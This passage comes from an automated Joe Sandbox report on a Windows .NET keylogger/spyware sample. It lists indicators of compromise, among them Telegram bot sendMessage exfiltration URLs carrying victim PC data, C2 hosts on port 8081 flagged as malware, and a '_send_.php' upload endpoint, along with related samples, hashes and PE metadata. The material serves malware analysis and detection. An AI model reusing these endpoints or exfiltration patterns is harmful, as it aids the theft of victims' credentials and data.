                                              https://api.telegram.org/botz1PO7311145.exefalse
                                                		unknown
                                                https://www.office.com/lBz1PO7311145.exe, 00000000.00000002.3696383781.0000000003081000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=z1PO7311145.exe, 00000000.00000002.3697607782.0000000003EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://www.office.com/xKz1PO7311145.exe, 00000000.00000002.3696383781.0000000003077000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    http://checkip.dyndns.orgz1PO7311145.exe, 00000000.00000002.3696383781.0000000002EC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=z1PO7311145.exe, 00000000.00000002.3697607782.0000000003EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://api.telegram.org/bot/sendMessage?chat_id=&text=z1PO7311145.exe, 00000000.00000002.3696383781.0000000002FA5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      https://chrome.google.com/webstore?hl=enz1PO7311145.exe, 00000000.00000002.3696383781.0000000003055000.00000004.00000800.00020000.00000000.sdmp, z1PO7311145.exe, 00000000.00000002.3696383781.0000000003046000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        https://www.ecosia.org/newtab/z1PO7311145.exe, 00000000.00000002.3697607782.0000000003EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://varders.kozow.com:8081z1PO7311145.exefalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://aborters.duckdns.org:8081z1PO7311145.exetrue
                                                        • URL Reputation: malware
                                                        		unknown
                                                        https://ac.ecosia.org/autocomplete?q=z1PO7311145.exe, 00000000.00000002.3697607782.0000000003EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://51.38.247.67:8081/_send_.php?Lz1PO7311145.exe, 00000000.00000002.3696383781.00000000030B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://reallyfreegeoip.org/xml/8.46.123.33$z1PO7311145.exe, 00000000.00000002.3696383781.0000000002F3A000.00000004.00000800.00020000.00000000.sdmp, z1PO7311145.exe, 00000000.00000002.3696383781.0000000002F7F000.00000004.00000800.00020000.00000000.sdmp, z1PO7311145.exe, 00000000.00000002.3696383781.0000000002FA5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://anotherarmy.dns.army:8081z1PO7311145.exetrue
                                                        • URL Reputation: malware
                                                        		unknown
                                                        https://chrome.google.com/webstore?hl=enxKz1PO7311145.exe, 00000000.00000002.3696383781.0000000003046000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:841675%0D%0ADate%20az1PO7311145.exe, 00000000.00000002.3696383781.0000000002FA5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchz1PO7311145.exe, 00000000.00000002.3697607782.0000000003EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://checkip.dyndns.org/qz1PO7311145.exefalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            https://chrome.google.com/webstore?hl=enlBz1PO7311145.exe, 00000000.00000002.3696383781.0000000003050000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              https://reallyfreegeoip.orgz1PO7311145.exe, 00000000.00000002.3696383781.0000000002F7F000.00000004.00000800.00020000.00000000.sdmp, z1PO7311145.exe, 00000000.00000002.3696383781.0000000002FA5000.00000004.00000800.00020000.00000000.sdmp, z1PO7311145.exe, 00000000.00000002.3696383781.0000000002F0F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://mail.electradubai.comz1PO7311145.exe, 00000000.00000002.3696383781.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, z1PO7311145.exe, 00000000.00000002.3696383781.00000000030C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namez1PO7311145.exe, 00000000.00000002.3696383781.0000000002EC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=z1PO7311145.exe, 00000000.00000002.3697607782.0000000003EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedz1PO7311145.exefalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://reallyfreegeoip.org/xml/z1PO7311145.exefalse
                                                                • URL Reputation: safe
                                                                		unknown

                                                                World Map of Contacted IPs

                                                                • No. of IPs < 25%
                                                                • 25% < No. of IPs < 50%
                                                                • 50% < No. of IPs < 75%
                                                                • 75% < No. of IPs

                                                                Public IPs

                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                149.154.167.220
                                                                		api.telegram.orgUnited Kingdom
                                                                		62041TELEGRAMRUtrue
                                                                188.114.97.3
                                                                		reallyfreegeoip.orgEuropean Union
                                                                		13335CLOUDFLARENETUStrue
                                                                158.101.44.242
                                                                		checkip.dyndns.comUnited States
                                                                		31898ORACLE-BMC-31898USfalse
                                                                192.250.231.25
                                                                		mail.electradubai.comUnited States
                                                                		36454CNSV-LLCUStrue

                                                                General Information

                                                                Joe Sandbox version:41.0.0 Charoite
                                                                Analysis ID:1528088
                                                                Start date and time:2024-10-07 15:31:12 +02:00
                                                                Joe Sandbox product:CloudBasic
                                                                Overall analysis duration:0h 7m 8s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:full
                                                                Cookbook file name:default.jbs
                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                Number of analysed new started processes analysed:16
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:0
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Analysis stop reason:Timeout
                                                                Sample name:z1PO7311145.exe
                                                                Detection:MAL
                                                                Classification:mal100.troj.spyw.winEXE@1/0@4/4
                                                                EGA Information:
                                                                • Successful, ratio: 100%
                                                                HCA Information:
                                                                • Successful, ratio: 100%
                                                                • Number of executed functions: 74
                                                                • Number of non-executed functions: 32
                                                                Cookbook Comments:
                                                                • Found application associated with file extension: .exe
                                                                • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                Warnings

                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                                                • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, 4.8.2.0.0.0.0.0.0.0.0.0.0.0.0.0.2.0.0.0.2.0.c.0.0.3.0.1.3.0.6.2.ip6.arpa, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                                • Not all processes where analyzed, report is missing behavior information
                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                • VT rate limit hit for: z1PO7311145.exe

                                                                Simulations

                                                                Behavior and APIs

                                                                TimeTypeDescription
                                                                09:32:10API Interceptor12792314x Sleep call for process: z1PO7311145.exe modified

                                                                Joe Sandbox View / Context

                                                                IPs

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                149.154.167.220PO.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    rREQUESTFORQUOTE-INQUIRY87278.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                                                      SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                        Yeni Sipari#U015f.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                          COMPANY PROFILE_pdf.exeGet hashmaliciousDarkTortilla, Snake KeyloggerBrowse
                                                                            Pla#U0107anje,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              Quotation.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                sam.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                  ENQUIRY NEED QUOTATION.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    188.114.97.3Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                                                                    • www.cc101.pro/0r21/
                                                                                    http://www.thegulfthermale.com.tr/antai/12/3dsec.phpGet hashmaliciousUnknownBrowse
                                                                                    • www.thegulfthermale.com.tr/antai/12/3dsec.php
                                                                                    QUOTATION_OCTQTRA071244PDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                                    • filetransfer.io/data-package/eZFzMENr/download
                                                                                    QUOTATION_OCTQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • filetransfer.io/data-package/MlZtCPkK/download
                                                                                    https://technopro-bg.com/redirect.php?action=url&goto=mairie-espondeilhan.com&osCsid=m24rb0l158b8m36rktotvg5ti2Get hashmaliciousHTMLPhisherBrowse
                                                                                    • mairie-espondeilhan.com/
                                                                                    QUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • filetransfer.io/data-package/758bYd86/download
                                                                                    QUOTATION_OCTQTRA071244PDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                                    • filetransfer.io/data-package/58PSl7si/download
                                                                                    QUOTATION_OCTQTRA071244PDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                                    • filetransfer.io/data-package/58PSl7si/download
                                                                                    payment copy.exeGet hashmaliciousFormBookBrowse
                                                                                    • www.cc101.pro/0r21/
                                                                                    BX7yRz7XqF.lnkGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                                    • cloud.dellicon.top/1000/500/
                                                                                    158.101.44.242PO.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • checkip.dyndns.org/
                                                                                    #Uc740#Ud589_#Uc0c1#Uc138#Uc815#Ubcf4.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • checkip.dyndns.org/
                                                                                    sam.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                    • checkip.dyndns.org/
                                                                                    QUOTATION_OCTQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • checkip.dyndns.org/
                                                                                    MT103-93850.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • checkip.dyndns.org/
                                                                                    StatementXofXaccount.docx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • checkip.dyndns.org/
                                                                                    z1PurchaseOrder.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                    • checkip.dyndns.org/
                                                                                    MT Eagle Asia 1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • checkip.dyndns.org/
                                                                                    KBGC_1200O000000_98756.docx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • checkip.dyndns.org/
                                                                                    Updated New Order.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • checkip.dyndns.org/

                                                                                    Domains

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    reallyfreegeoip.orgPO.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 188.114.96.3
                                                                                    TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 188.114.96.3
                                                                                    rREQUESTFORQUOTE-INQUIRY87278.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                                                                    • 188.114.97.3
                                                                                    SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                    • 172.67.177.134
                                                                                    8038.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • 188.114.96.3
                                                                                    COMPANY PROFILE_pdf.exeGet hashmaliciousDarkTortilla, Snake KeyloggerBrowse
                                                                                    • 188.114.97.3
                                                                                    #Uc740#Ud589_#Uc0c1#Uc138#Uc815#Ubcf4.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • 188.114.96.3
                                                                                    movimiento_INGDIRECT.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • 188.114.97.3
                                                                                    Pla#U0107anje,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 188.114.97.3
                                                                                    Quotation.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 188.114.96.3
                                                                                    checkip.dyndns.comPO.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 158.101.44.242
                                                                                    TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 132.226.247.73
                                                                                    rREQUESTFORQUOTE-INQUIRY87278.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                                                                    • 193.122.130.0
                                                                                    SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                    • 132.226.247.73
                                                                                    8038.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • 132.226.8.169
                                                                                    COMPANY PROFILE_pdf.exeGet hashmaliciousDarkTortilla, Snake KeyloggerBrowse
                                                                                    • 132.226.8.169
                                                                                    #Uc740#Ud589_#Uc0c1#Uc138#Uc815#Ubcf4.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • 158.101.44.242
                                                                                    movimiento_INGDIRECT.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • 193.122.130.0
                                                                                    Pla#U0107anje,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 193.122.6.168
                                                                                    Quotation.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 132.226.247.73
                                                                                    mail.electradubai.comQuotation.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 192.250.231.25
                                                                                    z64BLPL.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 192.250.231.25
                                                                                    api.telegram.orgPO.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 149.154.167.220
                                                                                    TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 149.154.167.220
                                                                                    rREQUESTFORQUOTE-INQUIRY87278.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                                                                    • 149.154.167.220
                                                                                    SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                    • 149.154.167.220
                                                                                    Yeni Sipari#U015f.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                    • 149.154.167.220
                                                                                    COMPANY PROFILE_pdf.exeGet hashmaliciousDarkTortilla, Snake KeyloggerBrowse
                                                                                    • 149.154.167.220
                                                                                    Pla#U0107anje,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 149.154.167.220
                                                                                    Quotation.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 149.154.167.220
                                                                                    sam.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                    • 149.154.167.220
                                                                                    ENQUIRY NEED QUOTATION.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 149.154.167.220

                                                                                    ASNs

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    TELEGRAMRUPO.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 149.154.167.220
                                                                                    TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 149.154.167.220
                                                                                    rREQUESTFORQUOTE-INQUIRY87278.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                                                                    • 149.154.167.220
                                                                                    SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                    • 149.154.167.220
                                                                                    Yeni Sipari#U015f.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                    • 149.154.167.220
                                                                                    COMPANY PROFILE_pdf.exeGet hashmaliciousDarkTortilla, Snake KeyloggerBrowse
                                                                                    • 149.154.167.220
                                                                                    Pla#U0107anje,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 149.154.167.220
                                                                                    Quotation.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 149.154.167.220
                                                                                    sam.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                    • 149.154.167.220
                                                                                    ENQUIRY NEED QUOTATION.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 149.154.167.220
                                                                                    CLOUDFLARENETUSfile.exeGet hashmaliciousLummaCBrowse
                                                                                    • 188.114.96.3
                                                                                    https://www.masonpost.com:443/cgi-bin/redir?https://ctrk.klclick3.com/l/01J9K8KGETH6JCWEWSWY0Z1M23_0?upn=u001.itvpsDR1UD2k9ruxjm0OAspgqcVOQ2hpn9lpb50VxZJdbi9nOzDV7HSnhKeIcaLQsgzZhAfJ867-2F8IcC-2BBYACBF80J8eA0O7PKeZKrlC1Q54Fj-2FS5ho91OPbLHjsGsZQWTyMbbJfNaQPKh9-2FKW31wr-2BMvAwYD85cdCTmlJyLauY-3D1xqt_Zis0fkz6H88oOTECUjdmAu-2FGkDDLbhQT-2B-2B9-2BD8-2Fn-2BuGRBn47ofPUerdduk-2BghIIr31LJs6iNd0rpuOZI5rlm3TOpkCWZ1eNCAWCuASI4dMP9Tv6jbA2UWTI2YWLmFZqgYeVzSc0Fb4o9iKg-2BzjSlX63m5ZgVPzXZ0W3SrrpOTDVmr8Vwd0xwSjxu9efo9kpJLVs7HOh7Cib6eG0OHldiYrljs5jy-2BsmDgNausa6sMCHSoHHj10FI3IfGuCnAD3e6jEbbsHVD11-2FD9cWADvkKxwETdgNpgixeie55jSwivWDLRKcdIczYG3CyTpA1Y18cj-2FBGLZEHTJvF1rd5yfWClPzV1Xw6x2CQgpVVbtrTE5NXtV8WFomzmraH-2FRE0uCvY#QE5lb19IYWNrZXJAb2ZmaWNlLmNvbQ==Get hashmaliciousUnknownBrowse
                                                                                    • 104.17.94.1
                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                    • 172.67.206.204
                                                                                    https://issuu.com/smart_media/docs/die_welt_wirtschaft/19Get hashmaliciousUnknownBrowse
                                                                                    • 104.18.36.155
                                                                                    Hscni Remittance_8115919700_16831215.htmlGet hashmaliciousTycoon2FABrowse
                                                                                    • 104.17.25.14
                                                                                    PO.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 188.114.96.3
                                                                                    TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 188.114.96.3
                                                                                    Payment.vbsGet hashmaliciousFormBookBrowse
                                                                                    • 188.114.96.3
                                                                                    PAYMENT SPECIFIKACIJA 364846637-pdf.vbsGet hashmaliciousRemcosBrowse
                                                                                    • 188.114.97.3
                                                                                    RFQ 245801.exeGet hashmaliciousFormBookBrowse
                                                                                    • 188.114.96.3
                                                                                    CNSV-LLCUSQuotation.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 192.250.231.25
                                                                                    z64BLPL.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 192.250.231.25
                                                                                    F#U0130YAT TEKL#U0130F#U0130-2400.exeGet hashmaliciousAgentTeslaBrowse
                                                                                    • 192.250.227.28
                                                                                    https://sesworld.com.au:443/it/mount/Get hashmaliciousUnknownBrowse
                                                                                    • 192.250.235.25
                                                                                    https://hmchive.com/?hcv=bGFldGl0aWEucGF0cnktYmFsYXRAc3VlZHp1Y2tlcmdyb3VwLmNvbS0tLS1DYXJsb3MgR2FpdMOhbg==Get hashmaliciousUnknownBrowse
                                                                                    • 192.250.227.21
                                                                                    z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeGet hashmaliciousFormBookBrowse
                                                                                    • 192.250.231.28
                                                                                    https://sgsconsulting.com/Get hashmaliciousUnknownBrowse
                                                                                    • 192.250.227.23
                                                                                    https://sgsconsulting.com/Get hashmaliciousUnknownBrowse
                                                                                    • 192.250.227.23
                                                                                    http://linkplea.se/doarGet hashmaliciousUnknownBrowse
                                                                                    • 192.250.229.80
                                                                                    rfq_commercial_order_GMlist_for_Drumedis_tender_august_quater_2024.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                    • 192.250.234.170
                                                                                    ORACLE-BMC-31898USPO.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 158.101.44.242
                                                                                    rREQUESTFORQUOTE-INQUIRY87278.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                                                                    • 193.122.130.0
                                                                                    #Uc740#Ud589_#Uc0c1#Uc138#Uc815#Ubcf4.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • 158.101.44.242
                                                                                    movimiento_INGDIRECT.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • 193.122.130.0
                                                                                    Pla#U0107anje,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 193.122.6.168
                                                                                    sam.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                    • 158.101.44.242
                                                                                    ENQUIRY NEED QUOTATION.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 193.122.6.168
                                                                                    ZEjcJZcrXc.elfGet hashmaliciousMiraiBrowse
                                                                                    • 193.122.239.124
                                                                                    na.elfGet hashmaliciousUnknownBrowse
                                                                                    • 130.61.64.122
                                                                                    na.elfGet hashmaliciousMiraiBrowse
                                                                                    • 130.35.12.7

                                                                                    JA3 Fingerprints

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    54328bd36c14bd82ddaa0c04b25ed9adTEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 188.114.97.3
                                                                                    rREQUESTFORQUOTE-INQUIRY87278.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                                                                    • 188.114.97.3
                                                                                    SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                    • 188.114.97.3
                                                                                    8038.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • 188.114.97.3
                                                                                    COMPANY PROFILE_pdf.exeGet hashmaliciousDarkTortilla, Snake KeyloggerBrowse
                                                                                    • 188.114.97.3
                                                                                    #Uc740#Ud589_#Uc0c1#Uc138#Uc815#Ubcf4.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • 188.114.97.3
                                                                                    movimiento_INGDIRECT.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • 188.114.97.3
                                                                                    Pla#U0107anje,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 188.114.97.3
                                                                                    Quotation.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 188.114.97.3
                                                                                    sam.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                    • 188.114.97.3
                                                                                    3b5074b1b5d032e5620f69f9f700ff0eTEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 149.154.167.220
                                                                                    Payment.vbsGet hashmaliciousFormBookBrowse
                                                                                    • 149.154.167.220
                                                                                    PAYMENT SPECIFIKACIJA 364846637-pdf.vbsGet hashmaliciousRemcosBrowse
                                                                                    • 149.154.167.220
                                                                                    https://bono-sicherheitstechniksharefile.btn-ebikes.com/Get hashmaliciousHtmlDropperBrowse
                                                                                    • 149.154.167.220
                                                                                    Portal.msiGet hashmaliciousUnknownBrowse
                                                                                    • 149.154.167.220
                                                                                    http://46.27.141.62Get hashmaliciousUnknownBrowse
                                                                                    • 149.154.167.220
                                                                                    rREQUESTFORQUOTE-INQUIRY87278.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                                                                    • 149.154.167.220
                                                                                    SecuriteInfo.com.Win64.MalwareX-gen.31726.9623.exeGet hashmaliciousUnknownBrowse
                                                                                    • 149.154.167.220
                                                                                    SecuriteInfo.com.Win64.MalwareX-gen.19388.23445.exeGet hashmaliciousUnknownBrowse
                                                                                    • 149.154.167.220
                                                                                    SecuriteInfo.com.Win64.MalwareX-gen.19388.23445.exeGet hashmaliciousUnknownBrowse
                                                                                    • 149.154.167.220

                                                                                    Dropped Files

                                                                                    No context

                                                                                    Created / dropped Files

                                                                                    No created / dropped files found

                                                                                    Static File Info

                                                                                    General

                                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Entropy (8bit):5.630776175113395
                                                                                    TrID:
                                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.79%
                                                                                    • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                    • Windows Screen Saver (13104/52) 0.07%
                                                                                    • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                                                    File name:z1PO7311145.exe
                                                                                    File size:276'992 bytes
                                                                                    MD5:b9a13749cc0659a2076afca8f7474509
                                                                                    SHA1:4cb32e56f1333ee8eb523c442d597bad0faf49b7
                                                                                    SHA256:c8f7435398a1f1de11e2b2385b2bfd92414860fe7394071ba329ad0ee1c22a48
                                                                                    SHA512:0377a1150581be8a39b17dc7a075d7ae11ee43f54b6dffec032548ada39cf704ca4dd883ca46557a4cb674ee023559d90abb0cf0b4fde702590223d612675553
                                                                                    SSDEEP:3072:8WAT5ctg+Orw0aqqb5mlXYOE6jc7dz0pHuHA7sfMobfD4lD7soAUYTVg4iIbbY:v6ySsfMobr4lDG7b
                                                                                    TLSH:914484092FE8A801D6FF8877C2B65125C6BAF06306698D3E16D1F81A3E3D541DE46F63
                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f..............P..$...........C... ...`....@.. ....................................@................................

                                                                                    File Icon

                                                                                    Icon Hash:00928e8e8686b000

                                                                                    Static PE Info

                                                                                    General

                                                                                    Entrypoint:0x44432e
                                                                                    Entrypoint Section:.text
                                                                                    Digitally signed:false
                                                                                    Imagebase:0x400000
                                                                                    Subsystem:windows gui
                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                    Time Stamp:0x669085D9 [Fri Jul 12 01:24:41 2024 UTC]
                                                                                    TLS Callbacks:
                                                                                    CLR (.Net) Version:
                                                                                    OS Version Major:4
                                                                                    OS Version Minor:0
                                                                                    File Version Major:4
                                                                                    File Version Minor:0
                                                                                    Subsystem Version Major:4
                                                                                    Subsystem Version Minor:0
                                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                    Entrypoint Preview

                                                                                    Instruction
                                                                                    jmp dword ptr [00402000h]
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
